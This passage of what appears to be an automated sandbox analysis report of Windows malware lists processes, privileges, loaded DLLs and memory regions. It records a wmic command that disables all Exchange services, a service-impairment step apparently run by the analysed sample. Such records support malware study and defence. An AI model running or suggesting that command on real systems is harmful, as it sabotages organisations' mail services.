"0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "58" os_parent_pid = "0xf54" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3835 start_va = 0x7fc44000 end_va = 0x7fc44fff entry_point = 0x0 region_type = private name = "private_0x000000007fc44000" filename = "" Region: id = 3836 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3837 start_va = 0xb389c10000 end_va = 0xb389c2ffff entry_point = 0x0 region_type = private name = "private_0x000000b389c10000" filename = "" Region: id = 3838 start_va = 0xb389c30000 end_va = 0xb389c43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b389c30000" filename = "" Region: id = 3839 start_va = 0xb389c50000 end_va = 0xb389c8ffff entry_point = 0x0 region_type = private name = "private_0x000000b389c50000" filename = "" Region: id = 3840 start_va = 0x7df5ff0b0000 end_va = 0x7ff5ff0affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff0b0000" filename = "" Region: id = 3841 start_va = 0x7ff6c3fd0000 end_va = 0x7ff6c3ff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3fd0000" filename = "" Region: id = 3842 start_va = 0x7ff6c3ffd000 end_va = 0x7ff6c3ffdfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ffd000" filename = "" Region: id = 3843 start_va = 0x7ff6c3ffe000 end_va = 0x7ff6c3ffffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ffe000" filename = "" Region: id = 3844 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3845 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3846 start_va = 0xb389d50000 end_va = 0xb389e4ffff entry_point = 0x0 region_type = private name = "private_0x000000b389d50000" filename = "" Region: id = 3847 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3848 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3849 start_va = 0xb389c10000 end_va = 0xb389c1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b389c10000" filename = "" Region: id = 3850 start_va = 0xb389c20000 end_va = 0xb389c26fff entry_point = 0x0 region_type = private name = "private_0x000000b389c20000" filename = "" Region: id = 3851 start_va = 0xb389c90000 end_va = 0xb389d4dfff entry_point = 0xb389c90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3852 start_va = 0xb389e50000 end_va = 0xb389e8ffff entry_point = 0x0 region_type = private name = "private_0x000000b389e50000" filename = "" Region: id = 3853 start_va = 0xb389e90000 end_va = 0xb389e90fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b389e90000" filename = "" Region: id = 3854 start_va = 0xb389ea0000 end_va = 0xb389ea6fff entry_point = 0x0 region_type = private name = "private_0x000000b389ea0000" filename = "" Region: id = 3855 start_va = 0xb389eb0000 end_va = 0xb38a037fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b389eb0000" filename = "" Region: id = 3856 start_va = 0xb38a040000 end_va = 0xb38a040fff entry_point = 0x0 region_type = private name = "private_0x000000b38a040000" filename = "" Region: id = 3857 start_va = 0xb38a050000 end_va = 0xb38a050fff entry_point = 0x0 region_type = private name = "private_0x000000b38a050000" filename = "" Region: id = 3858 start_va = 0xb38a070000 end_va = 0xb38a07ffff entry_point = 0x0 region_type = private name = "private_0x000000b38a070000" filename = "" Region: id = 3859 start_va = 0xb38a080000 end_va = 0xb38a200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b38a080000" filename = "" Region: id = 3860 start_va = 0xb38a210000 end_va = 0xb38b60ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b38a210000" filename = "" Region: id = 3861 start_va = 0x7ff6c3ed0000 end_va = 0x7ff6c3fcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c3ed0000" filename = "" Region: id = 3862 start_va = 0x7ff6c3ffb000 end_va = 0x7ff6c3ffcfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c3ffb000" filename = "" Region: id = 3863 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3864 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3865 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3866 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3867 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3868 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3869 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3870 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3871 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3872 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3873 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3874 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 266 os_tid = 0xf60 Thread: id = 267 os_tid = 0xf64 Thread: id = 268 os_tid = 0xf68 Process: id = "60" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x6686d000" os_pid = "0xf70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "58" os_parent_pid = "0xf54" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL ChangeStartMode 'Disabled'" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3888 start_va = 0xce0000 end_va = 0xcfffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 3889 start_va = 0xd00000 end_va = 0xd01fff entry_point = 0x0 region_type = private name = "private_0x0000000000d00000" filename = "" Region: id = 3890 start_va = 0xd10000 end_va = 0xd23fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d10000" filename = "" Region: id = 3891 start_va = 0xd30000 end_va = 0xd6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 3892 start_va = 0xd70000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000d70000" filename = "" Region: id = 3893 start_va = 0xdb0000 end_va = 0xdb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 3894 start_va = 0xdc0000 end_va = 0xdc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000dc0000" filename = "" Region: id = 3895 start_va = 0xdd0000 end_va = 0xdd1fff entry_point = 0x0 region_type = private name = "private_0x0000000000dd0000" filename = "" Region: id = 3896 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 3897 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 3898 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3899 start_va = 0x7f0d0000 end_va = 0x7f0f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0d0000" filename = "" Region: id = 3900 start_va = 0x7f0f9000 end_va = 0x7f0f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f9000" filename = "" Region: id = 3901 start_va = 0x7f0fc000 end_va = 0x7f0fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f0fc000" filename = "" Region: id = 3902 start_va = 0x7f0fd000 end_va = 0x7f0fffff entry_point = 0x0 region_type = private name = "private_0x000000007f0fd000" filename = "" Region: id = 3903 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3904 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3905 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 3906 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3907 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 3908 start_va = 0xe90000 end_va = 0xe9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 3909 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3910 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3911 start_va = 0xef0000 end_va = 0xfeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ef0000" filename = "" Region: id = 3912 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3913 start_va = 0xce0000 end_va = 0xceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 3914 start_va = 0xcf0000 end_va = 0xcf3fff entry_point = 0x0 region_type = private name = "private_0x0000000000cf0000" filename = "" Region: id = 3915 start_va = 0xde0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 3916 start_va = 0xe20000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 3917 start_va = 0xff0000 end_va = 0x10adfff entry_point = 0xff0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3918 start_va = 0x1150000 end_va = 0x115ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3919 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3920 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3921 start_va = 0x74b70000 end_va = 0x74b9ffff entry_point = 0x74b70000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3922 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3923 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3924 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3925 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3926 start_va = 0x77090000 end_va = 0x77249fff entry_point = 0x77090000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3927 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3928 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3929 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3930 start_va = 0x77ad0000 end_va = 0x77ad6fff entry_point = 0x77ad0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3931 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3932 start_va = 0x7efd0000 end_va = 0x7f0cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efd0000" filename = "" Region: id = 3933 start_va = 0x7f0f6000 end_va = 0x7f0f8fff entry_point = 0x0 region_type = private name = "private_0x000000007f0f6000" filename = "" Region: id = 3934 start_va = 0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3935 start_va = 0xd00000 end_va = 0xd00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d00000" filename = "" Region: id = 3936 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3937 start_va = 0xe60000 end_va = 0xe60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 3938 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3939 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3940 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3941 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3942 start_va = 0x5370000 end_va = 0x56a6fff entry_point = 0x5370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3943 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3944 start_va = 0x1160000 end_va = 0x1248fff entry_point = 0x1160000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3945 start_va = 0xe70000 end_va = 0xe73fff entry_point = 0x0 region_type = private name = "private_0x0000000000e70000" filename = "" Region: id = 3946 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 3947 start_va = 0x10b0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3948 start_va = 0x1160000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3949 start_va = 0x1160000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3950 start_va = 0x12d0000 end_va = 0x12dffff entry_point = 0x0 region_type = private name = "private_0x00000000012d0000" filename = "" Region: id = 3951 start_va = 0x1160000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3952 start_va = 0x1200000 end_va = 0x120ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 3953 start_va = 0xe80000 end_va = 0xe8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 3954 start_va = 0x56b0000 end_va = 0x578efff entry_point = 0x56b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 3955 start_va = 0x5790000 end_va = 0x5b8ffff entry_point = 0x0 region_type = private name = "private_0x0000000005790000" filename = "" Region: id = 3956 start_va = 0xea0000 end_va = 0xea0fff entry_point = 0xea0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 3957 start_va = 0xeb0000 end_va = 0xecffff entry_point = 0x0 region_type = private name = "private_0x0000000000eb0000" filename = "" Region: id = 3958 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3959 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3960 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3961 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3962 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3963 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3964 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3965 start_va = 0x10b0000 end_va = 0x10d9fff entry_point = 0x10b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3966 start_va = 0x1100000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 3967 start_va = 0x5b90000 end_va = 0x5d17fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005b90000" filename = "" Region: id = 3968 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3969 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3970 start_va = 0xed0000 end_va = 0xedffff entry_point = 0xed0000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 3971 start_va = 0x5d20000 end_va = 0x5ea0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005d20000" filename = "" Region: id = 3972 start_va = 0x5eb0000 end_va = 0x72affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005eb0000" filename = "" Region: id = 3973 start_va = 0xee0000 end_va = 0xee0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ee0000" filename = "" Region: id = 3974 start_va = 0x10b0000 end_va = 0x10b0fff entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3975 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3976 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3977 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 3978 start_va = 0x72b0000 end_va = 0x73affff entry_point = 0x0 region_type = private name = "private_0x00000000072b0000" filename = "" Region: id = 3979 start_va = 0x10c0000 end_va = 0x10c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 3980 start_va = 0x1210000 end_va = 0x12c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Region: id = 3981 start_va = 0x10c0000 end_va = 0x10c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 3982 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 3983 start_va = 0x73b0000 end_va = 0x74affff entry_point = 0x0 region_type = private name = "private_0x00000000073b0000" filename = "" Region: id = 3984 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3985 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3986 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 3987 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 3988 start_va = 0x11c0000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 3989 start_va = 0x72b0000 end_va = 0x72effff entry_point = 0x0 region_type = private name = "private_0x00000000072b0000" filename = "" Region: id = 3990 start_va = 0x72f0000 end_va = 0x732ffff entry_point = 0x0 region_type = private name = "private_0x00000000072f0000" filename = "" Region: id = 3991 start_va = 0x7330000 end_va = 0x736ffff entry_point = 0x0 region_type = private name = "private_0x0000000007330000" filename = "" Region: id = 3992 start_va = 0x73a0000 end_va = 0x73affff entry_point = 0x0 region_type = private name = "private_0x00000000073a0000" filename = "" Region: id = 3993 start_va = 0x74b0000 end_va = 0x74effff entry_point = 0x0 region_type = private name = "private_0x00000000074b0000" filename = "" Region: id = 3994 start_va = 0x7efca000 end_va = 0x7efccfff entry_point 